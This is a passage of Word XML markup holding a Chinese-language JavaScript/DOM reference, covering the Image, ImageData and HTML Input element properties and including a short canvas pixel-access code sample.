    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图片的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。设置这个属性将会下载指定的图片。如果</w:t>
      </w:r>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>对象已插入到文档中了，则新的图片将会显示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsi</w:t>
      </w:r>
      <w:r>
        <w:t>gned long width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图片在屏幕上显示的实际宽度，单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素。设置这个值将改变图片在屏幕上的宽度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="842" w:name="ImageData"/>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:bookmarkEnd w:id="842"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞的像素数据数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象保存一块矩形区域的像素的红、绿、蓝以及</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>（透明度）分量。可通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>createImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>getImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来得到一个</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定像素矩形区域的尺寸。</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个</w:t>
      </w:r>
      <w:r>
        <w:t>包含对应像素数据的数组。</w:t>
      </w:r>
      <w:r>
        <w:t>data[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组中的像素以从左到右、从上到下的顺序出现。每一个像素由</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节值组成，分别表示</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>分量。也就是说，在一个</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象中，位于</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>处的像素的颜色组成可以以类似这样的方式访问：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var offset=(x+y*image.width)*4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var red=image.data[offset];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var green=image.data[offset+1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var blue=image.data[offset+2];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var alpha=ima</w:t>
      </w:r>
      <w:r>
        <w:t>ge.data[offset+3];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>data[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组不是一个真正的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组，它是一个优化过的类数组对象，其元素的值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:t>之间的整数。元素是可读写的，但数组的长度是固定的。对任意一个</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>来说，</w:t>
      </w:r>
      <w:r>
        <w:t>i.data.length</w:t>
      </w:r>
      <w:r>
        <w:t>总是等于</w:t>
      </w:r>
      <w:r>
        <w:t>i.width*i.height*4</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byte[]data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个只读的引用，指代一个元素为字节的可读写的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long height</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Image data</w:t>
      </w:r>
      <w:r>
        <w:t>的行数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>每行的像素数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="843" w:name="Input"/>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:bookmarkEnd w:id="843"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。它的外观和行为取决于它的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性：比如，一个</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素可能表示一个简单的文本输入框、一个复选框、一个单选框、一个按钮、一个文件选择元素。由于＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素可以表示如此多种表单控件，因此</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素是最复杂的元素之一。关于</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单及表单元素的概览可参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.9</w:t>
      </w:r>
      <w:r>
        <w:t>节。注意</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>nput</w:t>
      </w:r>
      <w:r>
        <w:t>元素的一些重要属性（比如</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>）的文档在</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>参考页中。</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w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素也实现了</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>定义的所有属性。这个列表中标有星号的属性是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>新定义的，在写作本书的时候还没有广泛实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>string accept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>"file"</w:t>
      </w:r>
      <w:r>
        <w:t>时，这个属性是一个以逗号分隔的列表，包含可选择的文件的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型。字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"audio/*"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"video/*"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"image/*"</w:t>
      </w:r>
      <w:r>
        <w:t>也是合法的值。这个属性是</w:t>
      </w:r>
      <w:r>
        <w:t>accept</w:t>
      </w:r>
      <w:r>
        <w:t>属性的一个映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string autocomplete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果浏览器可以根据之前访问会话的值预填这个</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素则此属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。映射</w:t>
      </w:r>
      <w:r>
        <w:t>autocomplete</w:t>
      </w:r>
      <w:r>
        <w:t>属性。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>autocomplete</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean checked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于可选中的</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素，这个属性指定当前元素是否</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>选中</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>设置这个属性的值将改变对应</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素的可视外观。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean defaultChecked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于可选中的</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素，这个属性指定元素初始状态时的选中情况。当表单被重置后，该元素的</w:t>
      </w:r>
      <w:r>
        <w:t>checked</w:t>
      </w:r>
      <w:r>
        <w:t>属性将被重置为这个属性的值。它是</w:t>
      </w:r>
      <w:r>
        <w:t>checked</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string defaultValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>适用于具有文本值的元素，这个属性保存元素显示的初始值。当表单被重置时，元素将被重置为这个值。它是</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly File[]fles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"file"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>一个类数组对象，由用户选中的</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象或其他对象组成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string formAction*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于提交按钮元素，这个属性定义的值将覆盖包含的表单的</w:t>
      </w:r>
      <w:r>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:t>属性。它是</w:t>
      </w:r>
      <w:r>
        <w:t>formaction</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string formEnctype*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于提交按钮元素，这个属性定义的值将覆盖包含的表单的</w:t>
      </w:r>
      <w:r>
        <w:t>enctype</w:t>
      </w:r>
      <w:r>
        <w:t>属性。它是</w:t>
      </w:r>
      <w:r>
        <w:t>formenctype</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string formMethod*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于提交按钮元素，这个属性定义的值将覆盖包含的表单的</w:t>
      </w:r>
      <w:r>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:t>属性。它是</w:t>
      </w:r>
      <w:r>
        <w:t>formethod</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean formNoValidate*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>适用于提交按钮元素，这个属性定义的值将覆盖包含的表单的</w:t>
      </w:r>
      <w:r>
        <w:t>noValidate</w:t>
      </w:r>
      <w:r>
        <w:t>属性。它是</w:t>
      </w:r>
      <w:r>
        <w:t>formnovalidate</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string formTarget*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于提交按钮元素，这个属性定义的值将覆盖包含的表单的</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性。它是</w:t>
      </w:r>
      <w:r>
        <w:t>formtarget</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean indeterminate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于复选框，这个属性指定该元素是否处于不确定状态（即不是选中也不是未选中）。这个属性不是某个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射，只能通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:t>设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element list*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>datalist</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，其包含的＜</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素可被浏览器用做提示或自动完成值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string max*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素允许的最大有效值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long maxLength</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"password"</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性将指定允许用户输入的最大字符数。注意它与</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>属性不一样。它是</w:t>
      </w:r>
      <w:r>
        <w:t>maxlength</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string min*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素允许的最小有效值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean multiple*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果对应</w:t>
      </w:r>
      <w:r>
